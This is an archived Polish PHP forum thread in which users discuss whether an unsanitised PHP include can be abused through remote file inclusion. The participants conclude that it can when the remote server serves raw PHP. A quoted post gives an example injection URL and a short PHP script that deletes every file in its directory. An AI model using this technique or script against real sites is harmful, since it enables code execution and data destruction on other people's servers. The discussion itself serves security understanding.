Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Zagrożenie przy Includowanie pliku z innegoServera
Forum PHP.pl > Forum > PHP
maverickkk
Hi.

W manualu php jest napisane o include:

"(..)Ściśle mówiąc, nie jest to to samo, co wczytywanie pliku lokalnego; jest to wykonanie pliku na zdalnym serwerze i wklejenie rezultatu jego działania do skryptu wywołującego. W tym przypadku, rzecz jasna, zasięg globalny zmiennych nie obejmuje pliku wczytywanego tą metodą."

Czyli defakto nie jest możliwy atak na niezabezpieczony include podająć adres URL do pliku .php na innym serverze questionmark.gif przykładowo gdzie include($tytul) :

http://xxxxx.pl/?tytul=http://123.123.123.123/index.php

Pozdro.
LBO
polecam dogłębną lekturę tego tematu - jest tam między innymi odpowieź na nurtujące Ciebie pyt.

cheers
maverickkk
LBO -> Przeglądałem podany temat ale teraz zrobie to dogłebnie jeśli mam znaleść tam rozwiązanie...

Ale już pierwsze słowa się nie zgadzają z manualem bo jest pisane w poście
Cytat
"(..)Taki skrypt dokonałby dołączenia pliku katalog.php do skryptu lecz co by się stało gdyby włamywacz wpisał taki adres:
http://www.jakas-strona.pl/index.php?plik=...t-niszczacy.php

Dajmy na to że skrypt znajdujący się na serwerze hakera wygląda tak:

<?php
$katalog = opendir('./'); /* skrypt otwiera katalog w którym się znajduje (zostaje wywołany */
while ($plik = readdir($katalog)) {
unlink($file);
} ?>

No i jeżeli pliki w katalogu mają uprawnienia pozwalające na usunięcie ich przez skrypt to możemy się pożegnać z plikami w katalogu.(..) "


A manual mówi "
Cytat
(..) jest to wykonanie pliku na zdalnym serwerze i wklejenie rezultatu jego działania do skryptu wywołującego(..)"


Czyli jedyne co hacker może skasować takim skryptem to katalogi na własnym serverze ? Czyli dalsze sposoby są bezurzyteczne na zablokowanie includowania przez URL. Bo taki gość sobie zainkluduje plik, strona zmienic wygląd ale w żaden sposób nie zmienic zawartośći plików na naszym serverze ?
LBO
a co jeżeli haker wyłączy obsługę php na swoim serwerze i include'owany plik będzie zawierał czysty php w postaci:

  1. <?php
  2. //unfriendly script
  3. ?>
maverickkk
I to jest dobre pytanie.

Sprawdziłem jeśli plik jest zakończony inaczej niż .php to jego zawartość jest wykonana na serverze ofiary. Groźnie sleepysmiley03.gif

Czyli wszystkie rozwiązania w temacie który podałeś są słuszne tongue.gif

LBO -> thx za pomoc.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.